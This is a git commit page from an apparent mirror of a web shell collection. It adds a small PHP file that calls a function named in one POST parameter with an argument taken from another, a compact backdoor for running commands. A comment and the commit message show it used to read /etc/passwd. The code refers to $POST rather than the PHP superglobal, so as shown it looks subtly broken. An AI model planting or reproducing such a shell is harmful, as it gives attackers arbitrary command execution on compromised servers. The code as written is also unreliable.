1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 21:01:29 +00:00

Create simple_2022_08_15.php

running : system('cat /etc/passwd')
![img](https://raw.githubusercontent.com/tennc/webshell/master/php/Fig4-web-shell-example-2.png)
This commit is contained in:
tennc
2022-08-15 00:46:41 +08:00
committed by GitHub
parent 95f12107a7
commit 39cf8cacca

View File

@@ -0,0 +1,6 @@
<?php
$_=$POST['1'];
$__=$POST['2'];
// running -> system('cat /etc/passwd');
$_($__);
?>